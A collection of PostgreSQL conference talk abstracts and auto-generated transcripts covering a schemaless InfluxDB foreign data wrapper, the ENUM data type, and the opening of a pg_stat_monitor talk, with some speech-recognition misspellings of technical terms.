TPC then...
PostgreSQL is well-known for its extensibility. One can create their own types, operators, access methods, etc. or use powerful PL/pgSQL language to write functions, extensions, and so on and so on. Everything is thoroughly documented, supported and ready to use. However, there is also a very intimate extensibility layer, which allows external developers to peek right into the PostgreSQL core — hooks. For some reason this topic is not covered enough by official documentation. First, this talk will focus on which core hooks do exist, which options they provide for potential developers, and which PostgreSQL extensions get use of them to achieve an additional out-of-core functionality.
10.5446/53272 (DOI)
Hi everyone, today I want to talk about falling data wrapper study for Schimaritz database. I'd like to introduce myself. My name is Hiroki Kumagai and I live in Yokohama, Japan. And then I am working in Toshiba Corporation as software engineer. I have been developing software for embedded devices based on open source software for a while such as digital TV and so on. Recently since 2019, I have joined in current team and we are developing technologies required for accessing various data. In this session, I'd like to explain my study of FTW design and implementation that is applicable for Schimaritz database. And as a motif for this study, I use inflexdb. I will explain later about inflexdb. In this talk, Schimaritz database means database like not requiring column definition before inserting data. As you might know, FTW means a falling data wrapper. And it is a standardized way of handling access to data stored in external data source from SQL databases. Postgres can implement FTW as extension modules. As a gender, at first, I'd like to explain what is Schema on this talk and inflexdb features. And then I will explain current problems of inflexdb.fdw, especially for limitation related to Schema change. After that, I will explain the Schema-less design approach for FTW and its implementation and demonstration and consideration for improvement and conclusion. I searched what the Schema database stands for. In database terms, a Schema is the organization and structure of database. And Schema contains Schema object, which could be tables, columns, data types, views, and so on. There are many meanings for the term Schema, but in this talk, I focus only on column as Schema object. Inflexdb is a kind of time-seize database, so it is easy to use for managing sensor data of IoT devices and logging. As the element of data, we should know five keywords in inflexdb world. Measurement is something like a table in rdbms. Point is correspond to a record. Time stamp is a timestamp of the data point having name of time. And this is always existed. And internally, it is primary indexed. It is a metadata that this is also used as index, but optional. And the value must be string format. Field type, field set can be contained actual data values as a data point. At least one field data is required. Value type can be chosen from integer, float, string, Boolean. For convention, I will use these three data called as inflexdb keys and correspond to columns in rdbms. As other inflexdb features, there are two major release versions, version one and two, but we are focusing on version one at this moment. Query language is no SQL and the first one is inflexql. It is an SQL like query language for inflexdb. And there is yet another language, flux. But we use inflexql because we think this is primary language on version one. And as a schema less feature, application can write new tags and fields at any time without changing schema operation like alter table. Here I would like to explain the schema less operation example by insert query in inflexql. First step, this insert operation will write tag key device id and value of device one. And field key sig A with value of one into measurement at s at the next time zero. In this state, there are only two keys of device id and sig A. Next step without changing data definition explicitly, we can insert new data with new tag sub id and also new field sig B. Like this table, the schema is updated by insert operation only. Next is about FDW for inflexdb. We have one FDW implementation. Actually in our project, we are developing and providing source code in this GitHub repository. Without the spec of this FDW, it supports only scan operation. But it also supports pushdown operation for wear clothes and some aggregate functions. An important part of this talk, current FDW maps inflexdb tags and fields into columns of falling table one to one. As current problems, version two is not supported and it is lack of insert delete of support and it needs to improve usability for the inflexdb schema change. After this, I will explain about this schema change. As step one, a data point is written like this in inflexdb. And for this state of measurement, we have to create a falling table like this query in postgres. As column, there are time, device id and sig A. They are corresponding to inflexdb data keys one to one. After this, if we try to insert a new data point with new field key sig B, postgres cannot access to column B, column sig B. As you can see, inflexdb does not require special effort for adding new data elements, but FDW needs to change the table definition accordingly. So next, I want to eliminate this effort. As my goal, there are two points for design and implementation for schemaless support in inflexdb FDW. First, it's FDW should be able to access data from inflexdb without knowing actual schema on inflexdb. By this rule, it is possible to avoid effort for maintaining falling table. Second, it's FDW should be able to execute pushdown as possible as to prevent performance degradation. These figures shows the difference between pushdown and no pushdown. For example, current FDW can execute pushdown like this. Aggregate function like sum function. We can execute in remote. And we want to keep this pushdown feature even schemaless support. As my design approach, I'd like to fix the definition of falling table regardless of the inflexdb measurement state. And against four tag and field set, we map each data set into unstructured data types based on each store type. As the actual data types, I introduced new two types of inflexdb tags and inflexdb fields. These two new types is used to indistinguish between tags and fields during deburthing. The falling table definition is like this. And this definition is not influenced by the inflexdb state of data. I'd like to explain the definition of these two new types, but before going further, I explain each store type. The each store data type can be used to store sets of key and value pairs within a single postgres value as a string. For example, in this string, call1,allow1,call2,allowA, call1 and call2 are keys. One is a value of call1 key and A is a value of call2 key. And there are many access methods prepared for each store data type. From here, I will explain the definition of new data type inflexdb tags and the inflexdb fields are also same definition. The implementation is like this. At first, create type and access functions for type is defined using each store c function, each store in. And using these access functions, create type is defined. Some members omitted. And allow operator is required for this type. So again, access function is defined using each store c function, each store fetch value. And allow operator is defined like this. As you can see new data type is defined using each store c function. And here I thought it's possible it is better to have a way to define areas types using each store like create type inflexdb tags, areas store. I'd like to explain how to refer the inflexdb keys for time, tag and field. In existing design, if the falling table is defined like this, we can select each columns like this. In new schema less design, we are always the falling table like this. And we can select corresponding inflexdb keys like this. As you can see using allow operator key allow value expression can be used to refer the value of the specified key within inflexdb tags and inflexdb field variables. Unfortunately, the query expression is complicated by the unusual. Here we'd like to consider getting all data from the falling table. We often select all columns by select star statement. In this query, because we do not specify any tag and or field keys, so if the w is difficult to output values of keys in separate columns, this is not compatible behavior with existing inflexdb fdw. And this output form may be a little difficult to use than the current fdw. This explains the usage of aggregation. At first it is allowed to specify inflexdb keys by using tags and fields variable with allow operator. However, the values of these inflexdb keys are always produced as string text data. So if the aggregate function expect to other data type for its argument, we have to cast them especially by some other data type. This example, we have to cast into big int to meet the argument type of some function and actual inflexdb value type. I won't explain further, but we need this type of cast expression also in where clause is as well. And group i can be specified in the same way. In this slide, I'd like to explain some kind of design issues when using unstructured data type. If we try to differ non-existing inflexdb keys, inflexdb does not respond errors without data. So fdw also do the same behavior as inflexdb. Now we consider cases if we make a mistake in differencing inflexdb keys between inflexdb tags and inflexdb fields. Because inflexdb behaves differently depending on tag or field, fdw should also change its behavior depending on it. However, if the inflexdb keys are used incorrectly, fdw may not be able to get correct results like this example. Misuse will be an expected result. And we might be able to check this kind of measure, misuse such if we can know correct set of tag key names. But however, I choose not to check these misuse such. I'd like to consider how to distinguish tag and field keys. And there is a way of getting tag key names by using dedicated query show tag keys. And fdw will get these tag key names by using this query only when import foreign schema is executed. There is another way to determine the tag key names by table option tags manually. However, it is not easy to use. So in the future, we'd like to automate detecting tag key names. fdw determine which keys are tags in query result by using this tag key names. From this slide, I'd like to explain the implementation based on my design approach. fdw can be implemented set of callback rootings. And fdw supports only scanning operation. So these callback rootings are called. But we have already existing fdw implementation for inflexdb. We have to modify only these four points. After this slide, I'd like to explain them. First, fdw need to know the inflexdb key names from query expression. Because we do not define actual inflexdb keys as columns in foreign table. So if get to foreign size callback, we fdw try to extract the inflexdb key names from a process to tlist in planner info. In this example, device ID, CIGA and CIGB are extracted as inflexdb key names. And this data stored in private data to use in other callback later. In order to extract inflexdb key names, fdw need to find target entry of data with an opxpar of a row operator and with it having variable of inflexdb tags or inflexdb fields as left argument and constant value as right argument. Next is modification of pushdown decision. If fdw need to allow pushdown, if expression is appeared like this opxpar and burn constant for inflexdb tags and inflexdb fields variable. And also they will have explicit cast expression within aggregated functions or to compare with other values. In this case, we will have expression constructed from core lsvo opxpar and constant. fdw need to allow pushdown this kind of expression too. And next, fdw need to construct remote query request into inflexdb. If we are trying to scanning for simple base relation, remote query can be constructed from inflexdb key names obtained at the get4in del size callback. If aggregation can be executed in remote, we should make a simple aggregate function target list from expression like agref target entry core lsvo opxpar by constant. Last is fdw need to construct result data which is consisting of unstructured data type variable inflexdb tags and inflexdb fields. In iterate4in scan, fdw executes query to inflexdb and using obtained result, values of tags are stored into inflexdb tags variable. And values of fields are stored into inflexdb fields variable by using tag key name list. The actual stored value is like this. The relation between key name and value are connected to its equal arrow. And multiple of these values are combined with comma. I'd like to demonstrate what I want to do. At first, we are going to create to 4in table. Upper half is a pskl shell and lower half is inflexdb cli. Now we can select all data both interfaces. There is same data. At this point, if we insert new data with new field key like this, in postgres can also get new field key without changing table definition like this. And also we can select specific inflexdb key value like this. And we can use aggregate functions like this. As you can see, we can push down the aggregate function in inflexdb. One is executed remote database. Using postgres version 13 with modified version of inflexdb fdw, now I could execute simple query but I think I need to further verification with test it. The tag names list, fdw need to know tag names in order to distinguish tags and fields. But fdw currently does not update automatically. So there is a room for improvement at this point. And I introduce new unstructured data types of inflexdb tags and inflexdb fields. They are just a partial copy of hstore data type. But I want to avoid partial copy of definition if possible. So I think it is good to have a way to over defining areas type for existing data types. This makes it easier to define and maintain. As a conclusion, I could show inflexdb fdw can be designed for schemaless databases by using unstructured data type based on hstore. This means we do not need to change table definition depending on state of remote database. I think this design can be applicable to fdw for other schemaless databases. But there will be cases it is suitable JSON type rather than hstore type for nested data structure. And we could confirm this fdw still supports pushdown feature. This is important from performance point of view. In the end, I'd like to release schemaless support in inflexdb fdw at least in this year. That's all for my presentation. Thank you for listening.
In order to connect to external databases, PostgreSQL supports Foreign Data Wrappers (FDW), and there are already many FDWs. However, among of FDWs have various restrictions preventing utilization of external databases features. As such a restriction, FDWs for schemaless databases need to change the foreign table definition, when some columns are added in remote database. This restriction can not take full advantage of the schemaless feature. In this time, we considered implementing FDW that does not require changing the external table when columns are added on external database. I would like to introduce this study based on the time-series database InfluxDB as schemaless database.
10.5446/53273 (DOI)
Okay, hello everybody, this is Boris Mejias. I'm a holistic system software engineer, more formally known as a solution architect working for EDB. I'm also an air guitar player, I like a lot of music, and you can find me on Twitter so you can exchange some ideas about this presentation, about Post-Lexuel and music in general. And the reason I'm presenting this is because I use Enum, the enumerated data types, which is, I think, the most underrated data type in Post-Lexuel. And I'm going to explain you why I like it a lot, and maybe you got convinced and then you are going to use it also in your application. This is basically a presentation meant for developers at the front end level, when they have to design their databases. So I'm giving you more tools in order to build more like better data integrity on the level of your database. So I think it fits well with Post-Lexuel because it's a presentation for developers. So let's say that we have to implement this application that is going to collect feedback from the Post-Lexuel visitors, taking great talks, speakers, different roles, Post-Lexuel and whatever, and they have to provide information between being awful, bad average, or good, greater, awesome. So these are all the possibilities that they have. So you have to put this information on your database. I'm not going to present you about front end because I'm terrible, but about database. Let's see how you register this feedback of the debt rooms. So first direct approach, you create a table with debt room feedback. So each feedback has to have its own ID, that's the debt feedback ID. And then you have a debt room ID, which is a foreign key pointing to a list of debt rooms. So you don't want to have like ghost debt room that gets feedback. So you have a moment in time when the people get clicked on the application to get the feedback and also the feedback itself, which you're going to store in a text value because we just described them, they're all just text. So this fits very well. So that's your feedback. So you insert the value, you say, I want to insert the person 1984 and room 42, which is actually debt room Post-Lexuel. And I'm going to register now and I'm going to say that the debt room is awesome. Yeah, it's quite a possible, quite a realistic test. So that inserts very well. And then the next one says that is awesome. So for some reason, type it wrongly, the application, different application, you have to open this database to many people. And it enters as well, because just a text and text, they all get valid. So you get all this information there. We don't want that. We want to guarantee valid feedback information. So what we are going to do exactly the same table, we're going to add a constraint. A good friend of mine, he said that a constraint is not, it's a bad word. It's actually a guarantee. It's guaranteeing you that this array here that you're saying, so for the feedback, it's going to be any value on this list. Yep. So those are the possible values and you only want to have those. So what is going to happen now is that if you insert, well, awesome, without Z, so wrong, then it's going to run text. It's going to tell you, sorry, your value violates this check constraint, which says that it's have to be these values on the, on the array. So please put it again. So this is going to guarantee valid values. This is very good. So we are going to apply this constraint, not only for that one feedback, but also for this other table that we have here, talk feedback, you see, it's just exactly the same. And we have to create again, exactly the same constraint. So as you can see, this is not going to scale. This is every time you have a four speakers and for all the other people that is all the other items that you want to get feedback is going to be terrible. You don't want to have this. So that's why you have normalization. This is the concept in database that is very important, very known. Sometimes there are some ways to denormalize and I agree. But in this case, you really want to have normalization. So what you do, you create a lookup table. So you have a table where you have all your feedbacks. This is not a language word, but it. The plural feedback and you have your ID and the name of the feedback. And you're going to insert all the possible values on this table. And then you can refer to this table from the feedback, the from feedback or talk feedback or speed speaker feedback. So this is the previous definition of the table. You see that you have their feedback as a text. Now you're going to have a feedback ID, which is going to be an integer referring to this lookup table. And now it's normalized. And it's impossible that you're going to introduce data that is not valid because it has to be first on the feedback table. Yeah. And you can reuse it. So now we have the talk table. So you see the previous one was the debt room. Sorry, the debt room feedback. And now you have the ID and I have the talk feedback and then you have the same ID and then you can reuse this table. So this is why normalization works. So now you insert the values. The only thing that I don't like about the solution is that now you have a number six here for saying that it's awesome if you don't remember which number it was. It is complicated. So you have to probably do and select and nested select there. So it is, it is okay. I mean, it's not that complicated, but you see how this starts making your queries a little bit more complicated. A little bit now that we have larger ones, it's going to be even more complicated. So now you got in the enumerated data type. And this is what I want to talk to you about. So let's see what in them can do for you. Inam is actually a type. Yeah, so we're going to define a type for feedback. So we're going to create a type. Does it create type? It's called feedback as an inam. And then we're going to give all the possible values for this type. Yeah, so we have six types there. And let's see what we can do with this inam. We create a table that from feedback. This is exactly the same one. I'm showing you the previous version with the ID as a foreign key. You can see there. Now, feedback ID. Now we're going to show you the one that has the text. When you start having the text, because this one has to have this constraint, it's too complicated. Now we just put feedback there. So it's our type. It says the same thing that your integer, timestamp, date, whatever. This is a feedback. It's a type. So you have created, you have extended your database with this type. So and you can reuse it then for all the tables. But let's see how it works. You just insert into different feedback exactly as you would do with text. So by the way, this is case sensitive. So it works exactly the same as the text. So it's more intuitive. And it is even better in the sense that you're not saying that this is text. This is a type of feedback. Only certain values are being accepted. So if you try to put some wrong values on it, like awesome there, it gives you an error. Not the same error as with the text, but it says you're even better. This is like invalid input value for inam feedback. It even tells you with an arrow there. Is it like, here's where you got it wrong on line two. Yeah. So this is my line one, line two. And it tells me where I have to fix it. Very good error reporting in postgres. So again, you have your feedback type. And now you have your bedroom feedback table with the type here of the column being feedback. And you can just reuse it now for the talk feedback, you just use feedback feedback. So it is reusable and it guarantees you valid data. So what about performance? One of the things is, oh, okay. So normalization is important for performance and everything. Let's see with concrete cases. So we have a comparison of a table with only text. Let's go to see what is the cost of having a check constraint there. Now let's see with feedback ID in a foreign key and the data type inam. Okay. So for this test, I just generated random entries for 2,267,709. Just a number as any other. Pro the valid of any number, not just 2 million or 3 million. Why not this one? And coincidentally, this is the telephone number of, or was the telephone number of Douglas Adams when he was writing the Hitchhiker's Guide to the Galaxy. There you go. So this one took me on my laptop. So it's not the best laptop. So I need anyone. 36 seconds and something for the first case. So the check constraint actually didn't change the performance. It's also 36 seconds. Look, this first two number. And you have another table involved. And you need to start making links between two tables. It takes more time. So normalization is good, but you pay a little bit of a performant. So inam, I put it there in white just because this is the moment of suspense is like, is it really bad? Well, not actually. It's just as good as text. So I think that's great. Good news. So we have a good type there. And I'm just going to concentrate on this tree, not on the first one, because if the first one doesn't give you any guarantee about the data, you should discard it. You need to work with databases that give you these guarantees and all the properties that you have for your data. Your data is important. So please use valid data. So during this presentation, I'm going to do an approach comparison. Not a performance comparison. It's an approach in general. So not just how fast it runs, but also how easy it is to write the code because as a from a developer point of view, it is important that your code is comprehensible and this is going to reduce the amount of bugs that you have in your code. At least it does for me. So the clearer the code, the less bugs that I have. In this case, I'm going to give a little bit better points to text check and inam feedback just because they run faster, but also because there's shorter code in order to do inserts. Okay, it's clearer. So let's see now, retrieve data. We saw how to import data. Let's retrieve data. This is for the text check. So we are going to count how many different feedback we get from a dev room. So we are going to select the feedback. This is text. So we are going to see the value and how many entries per value from the dev room feedback. And we need to do a dev room join here with the dev room table because you want to see the feedback from the Python dev room. I also tend presentations of the Python dev room. I think it's a very nice community as well. So and I go to group by feedback here. Now if you want to run this with the inam is exactly the same code. So it is very trivial to use it. It matches your way of thinking, at least my way of thinking, and it gives you feedback as a data type. It matches your way of business model, let's say. Now if you do it with a foreign key, it's not that extra complicated, but first of all, you need to change here from the name of the order table, which is going to be interpreted as feedback here. And you need to have an extra join here. So let me put it more clear here. You have a conversion here in terms of naming. And then you have to have this extra join there. Joins are expensive. And this is a small join, but in general, if you start to put it in a different query, you're going to see that joins actually cost you. So it is a little bit more complicated to retrieve data with foreign key, with a lookup table. Yeah. So again, my personal opinion, and I'm sorry, but this is my presentation, so I can give the point and you can evaluate whether I'm being partial or not. So I think the text and enum for retrieving data is much easier than with a foreign key. Yeah, there you go. Now what about date integrity? So this is the query for text check. I'm going to select everything from that room for all the dev rooms where the feedback is being great. And I get in 94 milliseconds, zero rows. Okay. Well, nobody thinks this any dev room is great. Let's see with the foreign key. So again, I need to add the join. So you see again, things start getting a little bit more verbose in terms of code. And again, I get zero rows this time in 100 milliseconds. Now is it that nobody thinks that the dev rooms are great? No, it is not that I made a mistake. This is a bug. I have a typo there. It's not great. It's great. So that's wrong, but I didn't notice. So I thought there were zero values. So I would believe that nobody thought the dev room was great. Just because I made a bug. So let's see what happened if you do exactly the same for Inam. So look at the code, the first line here. This is for text. And it's exactly the same code for Inam. Inam is going to tell me that this is wrong input. So it tells that this value that I'm trying to use here, because this is a type of feedback, not just text, it's going to validate the type when I'm using it in the query. And it's going to tell me an error in less than a millisecond. So the other two queries return zero values after scanning the table or using indexes, whatever. And then they tell me that it's zero rows. It depends on the size of your table. This one depends on the size of your Inam. So this is more or less like constant time. It's always going to be as fast as possible to tell me that this is wrong input. So you may say, I'm a good developer, I will never make the mistake. This is because you're typing there and you made the mistake. It's true. I understand that and I agree with you. But possibly you have to open, because this is false, then you have to open this database to all the applications. And the other developers are not going to be as good as you, and they're going to make the mistakes. Or you have to open this as an API and everything. So think about it. I mean, this is data integrity from the retrieving as well. So the other one guarantees us that we are going to insert valid data. This one is guaranteeing us that we are going to retrieve valid data. I think this is core another point. And it's very fast as well. It crashes immediately, error fast. So in the approach comparison, we said this before, get is good for text. And in Amp, let me add here another point because of data integration. And let me try to make it clear. Data integration, it is very important. So I hope that I convinced you about that. And let's continue with the rest of the presentation. So why normalization is relevant? So until now, we have seen that normalization is good with Inam, but with foreign keys kind of not paying us off or anything. So why do we use it? Ah, here's the point. Update. Let's say that average is a word that is ancient and nobody says average when you say like, how was it there from? And people say, meh. Because that's kind of the new word that people are using. I'm all I still say like, average for whatever. But it doesn't mean, but people want to say meh. So let's update the different feedback. And we're going to set everything that was average. We're going to say that as meh. This is not a valid query because you have a check constraint here. I guarantee a may is not a valid yet. So what you need to do is actually a full transaction that first is going to remove the constraint so that we can introduce the value of meh freely as it didn't exist any constraint at all. And then we need to read the constraint and check that the entire table validates this array here, which is the new value here with meh instead of average. And imagine that you want to do this for all the tables, talk feedback, speaker feedback and everything. So this is going to be very costly. This is bad. This is terrible. So that's why normalization is good. So this is the code for updating the table, the lookup table with feedbacks instead of saying average, we say meh. Is that all the code? Yes, it is. There's nothing else. Yeah. That's why normalization is good. So feedback with text check. Terrible. We put the three X there. We don't like it at all. And this is when this approach kind of went wrong. And the foreign key is good and is fast. And this is perfect. This is the why you need normalization. What about enums? So this is the moment that you say like, maybe this is not so good. This is a possibility of doing update with an enum. You alter the type. Yeah. So this is really DDL. So you alter the type and you say like, rename the value average to meh. Would that be enough? Yes. That's everything that you need to do. So we can also put a check there with in on feedback is as good and as fast and as efficient as with a foreign key. Yeah. There you go. Good. Now let's say that we want to delete data. So awesome. What is that? I mean, you ask somebody, what do you have for lunch? They say, whoa, burger in a lager. Oh, awesome. That's not awesome. Especially if it's a lager. So people say too fast. Awesome. So let's say that we don't want to have awesome anymore. And we go again with the same thing. And we're going to say that, okay, if somebody said the awesome, just put it a great is the best closest value. So we need to get a new array here. You know the story. Very expensive. Not so good. But I mean, there's nothing else that you can do. Is it better with normalization? While you say delete from feedbacks, where name is awesome. This should be enough, but when you run this is going to say like, oh, sorry, first you need to clean up all your tables. So you still need to do all these updates in all the other tables before, in order to be able to remove one value here. So it is a lot of work to remove, remove this thing, even if he is a normalized data. Yeah. So this is going to complain that you still have pointers from all the tables to this lookup table. Now for inam, unfortunately, there is no alter table drop value that doesn't exist. So stripe that. And there's some possibilities of creating a different type. You still go through all the cleanup in all the tables and then you change the column type. I'm not going to go into the details of this one, but I want to show you something similar about alternative data types. So that's it. I mean, deleting this kind of value is not so good for anyone. It's possible. It's possible. Yeah. That's why I put warnings there. So nobody scores well here. So fair approach. So an extra feature. So we saw insert. We saw retrieving data. We saw updating data and delete. Yeah. So let's see this extra feature that inam has. Might not be that important, but I think it's cool. So let's see. Inams are order. So when you create the data type, you give it in an order. So it goes from awful to awesome. Yeah. Then when you want to say, for instance, give me all the data rooms that has a feedback larger than good. So that would be scores that were great and awesome and how many times it happened this. I also want to have the name of the data rooms. So I have this join here. Yeah. So look, if I do it with text, this doesn't work because this is going to give me alphanumeric order. So great and good, well, we great, but awesome wouldn't be there. So it doesn't work. That's makes sense actually. So but you can do it with data types, sorry, with inam types, enumerated types. And it works. So you can try that. Now let's say that, I don't want to use always the same order. Let's say that I put them in a wrong order. You can create another inam type. Let's call it feedback alt, this one, where I put whatever order I want because people say awesome too quickly. So the first three are okay, but I want to put awesome just before average, after average and before good. So the real good one is great. Yeah. So my query is going to change now. So only going to give me the grid. So this is the first query when I say like feedback is larger than good. If I want to use this dynamic order change, I'm going to do the cast here. So you see I have the feedback. I'm going to cast it to text and from text I'm going to cast it to the feedback alternative. I could define it a little bit more to avoid this text intermediate stuff. But with this one is clear. I don't have to add extra code. I'm not hiding any code. This is exactly the code that you need to do for getting an alternative order. So this is strongly type with some dynamic order. I think it's powerful. Yeah. Well, anyway, you can also add values that are older into your inam. Let's say, well, in the beginning, we saw that we changed average to me. So we just say rename value average to me. And then we're going to add new things. Let's say like somebody was not bad, but it was just unlucky. So we insert unlucky before me and we insert presentation was fine after me. And we can do this in the type just like this. This is all the code that you need. And if you want to know what's going on in your type, you can always use this describe type capital T and with a plus and it's going to give you all the values in order. So now you know what's the order of your data types. Now, you can also investigate your numeric type and enumerated types. Sorry, not numeric enumerated by using this views from the catalog Pg underscore inam and Pg underscore type. Remember that this is a type. So the type name is feedback. And then you can say in order by inam sort order. And now you can see a little bit of the implementation of it. So this is the order. You get the label and it has some real numbers there. And that's how you can put things in between. Yeah. So it works. There you have the inam. And you can say like, oh, I can also do this on lookup table. Come on. I just use the order of the of the ID and then I get the same order. I just need to do some joint tables and everything. But then if you want to add some things or you want to use this dynamic order, you cannot well, okay, but let's say this is use a rank. And you can use like alternative ranking and everything. So here I have a rank. But not to use an integer here because you might want to have new values and they need a real number or reorder all these values. It's complicated. So let's say that you have unlucky and fine and because they were before and after may you have to put this 2.5 and 3.5. So now it looks a little bit or odd. They have here an order by numbers, which is different than this one. I'm a little bit picky because I want to promote inam, but let's order it by rank and then you see the integers and from the other side. Well, but this works. Yeah. So you need to add an extra column to your lookup table just because of the order. But it works. So let's get back to better than good. This is the first query that I show you with inam. This is a query with a lookup table and a ranking. So again, you add an extra join to your table and you need to add an INER select just to get the value of the ranking of good in order to do this larger than. So it's a very short example. It can get more complicated. So that's what I want to show you that inam is straightforward. Yeah. Okay. So this extra feature, the approach comparison, we can put it ordering with text check. You cannot have any order because it's going to give you alphabetic, alphanometric order, nothing to do with the real order. With foreign key, you can do it, but you need to add another column and then some other extra stuff with feedback. You get it for free, the inam type. Yeah. So you might use it. Okay. So I'm closing words. So now you know better, inam in Postgres. So you might want to give it a try if you really are convinced and you have already your values that are in text and select away, I have my text, I have my array. How do I move it to inam? Well you just create a type inam and you do a type cast from text to your new type and it's going to work. Now, what I feel is that when you're modeling your database, it matches better your way of thinking. So I create a type called feedback. I can have countries because they don't vary that much. I can have types of beer, for instance. You don't discover a new type of beer so often. It can be a variation, things like that, but you have a core type of beer. So you can use inam for this. It matches the way of your thinking of your applications. When you read the table, say, okay, of course, this is a beer type. Oh, this is feedback. Instead of saying text or integer, what does it mean? And as you saw already, this is very efficiently normalized. A lot of things that are implemented for you and you don't need to go through all these difficult changes in order to modify the values. Everything is for you. Except for delete, of course. I understand this is a draw, but it is not as easy with the others as well. And just remember that this presentation, it is specific to PostgreSQL. Inam is not a SQL standard, so it's not implemented in all the databases. And those databases that are implemented, they don't do it exactly the same way as PostgreSQL. So this is specific to PostgreSQL. This is the PostgreSQL step room and post them. And I hope that you can see the value of this if you're using inam in your using PostgreSQL. So contact me, ask me questions. I will be glad to answer your questions on Twitter as well if you want to know more about inams. Yeah. And I think that's all from me. Thank you very much. And unfortunately, we cannot go for a beer after this presentation, but it's early in the morning. But also we are not in person. But next time we see each other, we can have a chat and a beer. So thank you very much. Bye. I recorded that in the evening, but it's okay. I think you can start in any moment now. I see nothing happening. So, okay, we are online. Gio, would you like to start? Fantastic. Yes, that was a lovely talk. I know so much about Inam and we have gotten quite some questions. I will start with the very first one. When should I not use Enum? Yeah. Thanks, Giorgio. So, what I explained, one of the main issues, one of the main benefits of Inam is to use it for data integrity. And as somebody says, it's kind of a built-in way of having a normalized lookup table. But it works even more efficient because the implementation works pretty well. It is very cheap to do updates of the values. And the reordering is also possible to add things in between. So that's the one more use case, data integrity. And when you don't want to use Inam, it's when your values are going to change a lot. When your values are going to be deleted, when your values are going to be reordered in a different way. But I did show you a little bit of some tricks for doing some casts instead of having alternative ordering for the Inam. So you can have a catalog of ordering. That would be a possibility. And actually, deleting values is not only a problem for Inam. It's actually a problem of having actually a lookup table as well because the value that you want to delete is populated in all the tables. So you still have to clean up that value. But when things are kind of like statics and you want to have data integrity, I think that's the best use case. So if you don't need that, then you suggest use text, something that is more valuable. OK, so the next question is by Alit Sekuharcik. I remember from many years back that changing the Nam caused a huge log. Is it still present? Now, renaming the value, it is what you want to have. And the value is not stored on the tables. It's only the reference to the Inam. So if you look at the size, it is four bytes to the pointer to the Inam. So when you do the update of the values, it's just going to be on the table. So all the locking, probably if you are running queries that are dependent on the value at that time, those are going to be niche. But I think it still gives you a different guarantee that when you're looking with a lookup table. In terms of changing the value, it's the same cost as a lookup table, actually. Yeah. Right. The next question is from Publux. So is it still impossible to change a new order except update the system catalogs? No, so you can add things in between. No, the only way would be to create an alternative apparel Inam with the same values in a different order and then you can do the cost. And then you would have to do the cost of the column if you want to do that. So that's going to be a little bit expensive. Yeah. So that's one of the use cases that you don't want to have Inam if you have to change the order in too much.
The ENUM data type is extremely good to define constraints to column values. It adds descriptiveness to your database schema. In this talk you'll learn the advantages and disadvantages of the ENUM data type, and how to use it in your database schema design. The enumerated data type, ENUM, is rarely considered in the design of database schemas. This is either because ENUM is unknown, or because one or two drawbacks have created a wrong impression of it, hiding is major advantages. I use ENUM, because I consider it extremely good to define constraints to column values, providing a very descriptive design to match the business logic. This presentation attempts to vindicate the value of ENUM, the underdog of the data types. On this talk you'll learn: - Advantages and disadvantages of the ENUM types - How to use ENUM in your database schema design - Using ordering of ENUM values - Casting ENUM data types - Manipulating ENUM data types
10.5446/53276 (DOI)
Hi, okay. Hello everybody. Today, PG stack monitor the new way to analyze QD performance in post-credits skill. My name is Ibrahim and welcome to your forced them platform. So I will introduce myself and then Peter will introduce himself and then we will continue over slides. So, why am I my name is abroad Ahmed and I have been in software industry since 1998. And I've been working with post-credits girls in 2006 and have been in multiple post-credits companies and nowadays I'm working with Percona since last two and a half years. I'm also a PhD PhD candidate and space scholar and I'm completing my PhD. And here it is. Yes, the fear. Hey, I'm Peter, and I'm helping the Ebrar with his presentation. I also happen to be CEO of Percona and database performance geek. Right. I mean, I do not know as much about postgres. I would probably say what I, Ebrar has forgotten more about postgres than I will ever know. But I've been involved in a database industry for a long time and I thought it would be good for me to share some high level of why we are working on this extension and new way of performance monitoring for postgres. Next slide. Yeah, that is agenda. And I think there is another section of mine. So, at Percona, I've been working on the open source database performance problems for now or over 15 years and actually a few years before that, before that in my school, a B and other companies. Now, one thing which is what I learned in that time is what the modern databases are very, very powerful, right? If you look at postgres or actually any other modern database, it can take a lot of beating and handle very significant workloads if things are done right. But if you can write bad queries, then even few of those can really bring down otherwise very capable database. Now, if you look at that from a user standpoint, they often may not know what they have such queries, right? And then if they do, right, and say, oh, database is slow, probably have a bad query somewhere, they may not know the source of those queries, especially if they are running one database with many users, many developers, many applications. And finally, often it may not be that easy to find what to do with that, bad query or queries, then you spot them, right? And this is the problem what we are looking to solve and this extension, what we are going to talk about is a foundation component of such solution. Next slide. Now, if you think about the query data, there are a couple of approaches how you can source that data, right? And on a high level, you can think either from sampling the data, right, when you can say, hey, 100 times a second, I am going to look at the whole state of all my Postgres, see what queries are running, where the stack, CPU waiting on disk, and so on and so forth, right, and get that data. And the good thing about that, the overhead is limited, like pretty much by number of processes, right, and a sample rate, but also you have limited accuracy, and also you can have various management, measurement artifacts, right? And if you have enough, you will have your sampling process to be scheduled on CPU and run, only if that CPU core becomes available, and that means it's freed by the query which was running before that, right? And that's why you often tend to see more queries than in the waiting states, right, or completed than the system actually has, right? And those systems can especially ask measurement artifacts, can especially escalate when you have a system getting under extreme load, right, that is frankly a worst case when you want to have that data. Also, you can have another approach which you can think about as event counter, right, when the query starts, we increment the counters, how many roles this process, and then some other statistics, and then store that data somewhere, or get it out to the log file, and in this case, you are risk of an overhead which can be quite higher, but you can use a very, can get very good accuracy. And in Pitchestat-Mojit, where we are using event counting approach, and also as Ibrar will show you, we are able to do that with typically very limited performance overhead. Okay. So, if you look about the, after we searched those events, what exactly we can do with them? Like one approach is we can spit them out in the log, right, and then our consumers, like some monitoring application can parse the logs, and that gets kind of complicated, especially in the cloud, when something like Amazon RDS, you may not have a choice to run, you know, some agents on the database engine itself, right. The other approach is also you can have a database to maintain the same query log of all the queries it runs in some sort of tables. And it basically gets expensive, right, for every, you know, select for a primary key, you actually also have to need to do an insert in some log table, right, that sounds heavy, right, because it is. And the third approach is we'll say, well, you know what, we are not going to store information and make accessible about every single query, but we will capture enough statistics and a summary to give you the most important information about your workload, right, and that is a workload which is that monitor tanks. Next slide. Finally, let me highlight some data points about what is we are doing in PgState monitor and why and that is important. One thing is what we are going in extra mile to make sure you don't have just, you know, dollar star parameters, but actual values in the query, then possible. What is that important, because in this case you can actually run explain on the query which you see is running slow right and actually you often can play with query modify, modify it maybe you find a better way to run the same query but also ensure it has the same results, which is much more complicated if you just have the same parameters you have to figure out what to replace them with. We also have a time bucketing, which gives us a high fidelity start if much better network, poor network quality tolerance. Right. So, this kind of maybe a little bit complicated but think about this situation if you have your, your database system, which is stored somewhere. So, relatively far away with 